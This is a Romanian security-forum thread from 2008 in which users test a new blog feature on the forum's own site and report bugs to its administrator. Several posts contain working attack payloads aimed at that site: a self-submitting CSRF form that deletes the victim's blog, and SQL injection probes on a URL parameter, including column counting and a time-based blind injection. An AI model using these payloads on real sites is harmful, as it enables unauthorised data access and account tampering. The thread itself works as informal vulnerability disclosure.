kw3rln Posted June 27, 2008 Report Posted June 27, 2008 http://rstcenter.com/index.php?pagina=blogE o pagina in testare .. sa vedem daca va place.. daca nu prea o sa fie folosita o stergem Fiecare poate avea blog-ul lui pe site-ul RST!un short link: http://rstcenter.com/kw3rln.rst sau useruvostru .rst Quote
NEON Posted June 27, 2008 Report Posted June 27, 2008 auzi kw3rln da cum imi fac blog deala sau cum se numeste !! Quote
NEON Posted June 27, 2008 Report Posted June 27, 2008 scuzeee nu mam uitat ca scrie mai sus my bloG srrry !! Quote
moubik Posted June 27, 2008 Report Posted June 27, 2008 CSRF pentru auto-stergere blog:<script> setTimeout("document.getElementById('rstCSRF').submit();", 100);</script><form action="http://rstcenter.com/index.php?pagina=blog&cmd=myblog" id="rstCSRF" method="post"> <input type="hidden" value="closeblog2" name="action"/> <input type="submit" value="Confirm Close Blog"/></form> Quote
loki Posted June 27, 2008 Report Posted June 27, 2008 CSRF pentru auto-stergere blog:<script> setTimeout("document.getElementById('rstCSRF').submit();", 100);</script><form action="http://rstcenter.com/index.php?pagina=blog&cmd=myblog" id="rstCSRF" method="post"> <input type="hidden" value="closeblog2" name="action"/> <input type="submit" value="Confirm Close Blog"/></form>lol tu dai idei? Quote
moubik Posted June 27, 2008 Report Posted June 27, 2008 cum e in teste, e full disclosure de fapt kw3, verifica variabila "favourite" legata de sql injectionda niste rezultate ciudate, nu-mi dau seama ce se intampla de fapt acolo de dragul obisnuintei: ([url]http://rstcenter.com/index.php[/url]?pagina=blog&cmd=favourites&operation=add&favourite=144832 or 1=1asta nu face nici un echo la al doilea request:[url]http://rstcenter.com/index.php[/url]?pagina=blog&cmd=favourites&operation=add&favourite=144832 and 1=1asta spune ca nu exista blogul:[url]http://rstcenter.com/index.php[/url]?pagina=blog&cmd=favourites&operation=add&favourite=144832 and 1=2edit:spune ca nu exista blogul[url]http://rstcenter.com/index.php[/url]?pagina=blog&cmd=favourites&operation=add&favourite=144832 order by 7 --nu spune nimic iarasi:[url]http://rstcenter.com/index.php[/url]?pagina=blog&cmd=favourites&operation=add&favourite=144832 order by 6 --edit edit edit:uite si blind sql injection:[url]http://rstcenter.com/index.php[/url]?pagina=blog&cmd=favourites&operation=add&favourite=1448329 union all select 1,2,3,4,5, BENCHMARK(10000000,MD5(CHAR(97))) -- Quote
loki Posted June 28, 2008 Report Posted June 28, 2008 Nu stiu daca ajuta cu ceva, observ ca daca entry=19" cu ceva in coada adica, nu gaseste blogul cand postez comment, asta inseamna ca nu prea e verificata entry daca e strict numerica. Da abia acu ma uit in cod sa ma bucur si eu Quote
TheBes7 Posted June 28, 2008 Report Posted June 28, 2008 Foarte frumos, de abea a?tept s? am blogul meu RST Quote
kw3rln Posted June 28, 2008 Author Report Posted June 28, 2008 daca merge treaba o sa aveti gen: http://nick.rstcenter.com Quote
darkyndy Posted June 30, 2008 Report Posted June 30, 2008 M-am jucat putin ... am adaugat 3 bloguri la favorite.Cand dai pe add to favorite si totul e ok, ar trebui sa spuna "Blog adaugat", iar daca nu este ok requestul sa se spuna ca blogul nu a putut fi adaugat la favorite.M-am dus apoi la favorite ... si e gol si nu mai apare nici meniul specific blogului.Daca in comment dai new line cand esti pe view comment new line nu apar. Sfat: dupa ce scoate-ti continutul din tabela adaugati eu foloseam fct nl2br() Quote
ciubyever Posted October 17, 2008 Report Posted October 17, 2008 ce exemplu interesant ;)" http://rstcenter.com/kw3rln.rst " Quote